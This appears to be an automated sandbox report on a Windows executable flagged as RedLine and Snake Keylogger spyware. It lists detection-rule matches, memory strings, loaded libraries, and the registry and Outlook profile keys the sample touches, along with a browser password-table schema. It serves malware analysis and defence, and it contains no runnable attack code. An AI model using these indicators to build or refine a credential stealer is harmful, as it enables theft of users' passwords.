Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D2006	0_2_065D2006
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D2DC8	0_2_065D2DC8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D4967	0_2_065D4967
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D34B0	0_2_065D34B0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D12B8	0_2_065D12B8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D12AA	0_2_065D12AA
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D1C90	0_2_065D1C90
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D1C86	0_2_065D1C86
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D3B98	0_2_065D3B98
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_06C255E8	0_2_06C255E8
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_06C2C218	0_2_06C2C218
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_06C2398C	0_2_06C2398C

Source: C:\Users\user\Desktop\YDg44STseR.exe

Code function: String function: 0040E1D8 appears 44 times

Source: YDg44STseR.exe, 00000000.00000002.2675750699.0000000000435000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000003.1418351567.0000000000660000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000003.1418351567.0000000000660000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamempclient.dllj% vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000003.1418269920.0000000000650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000003.1418269920.0000000000650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamempclient.dllj% vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000002.2675652835.0000000000197000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs YDg44STseR.exe
Source: YDg44STseR.exe, 00000000.00000002.2676362275.0000000000619000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs YDg44STseR.exe
Source: YDg44STseR.exe	Binary or memory string: OriginalFilenameRemington.exe4 vs YDg44STseR.exe

Source: YDg44STseR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: YDg44STseR.exe, type: SAMPLE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.YDg44STseR.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.YDg44STseR.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: YDg44STseR.exe PID: 3352, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.winEXE@1/0@5/4

Source: C:\Users\user\Desktop\YDg44STseR.exe

Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

0_2_004019F0

Source: C:\Users\user\Desktop\YDg44STseR.exe

0_2_004019F0

Source: C:\Users\user\Desktop\YDg44STseR.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\YDg44STseR.exe

Command line argument: 08A

0_2_00413780

Source: YDg44STseR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\YDg44STseR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: YDg44STseR.exe, 00000000.00000002.2677264082.000000000289B000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1687084738.000000000370A000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.000000000285B000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.0000000002869000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.000000000288E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: YDg44STseR.exe	Virustotal: Detection: 54%
Source: YDg44STseR.exe	ReversingLabs: Detection: 79%

Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: YDg44STseR.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: C:\Users\user\Desktop\YDg44STseR.exe

0_2_004019F0

Source: YDg44STseR.exe

Static PE information: real checksum: 0x23bfb should be: 0x397af

Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0040E21D push ecx; ret	0_2_0040E230
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_06410036 push es; ret	0_2_06410038
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0642660B push es; iretd	0_2_064266D0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_064266A1 push es; iretd	0_2_064266D0
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065DEE60 push es; ret	0_2_065DEE70
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_065D1B59 push es; iretd	0_2_065D1C54
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_06C29BEF push es; ret	0_2_06C29C00

Source: C:\Users\user\Desktop\YDg44STseR.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
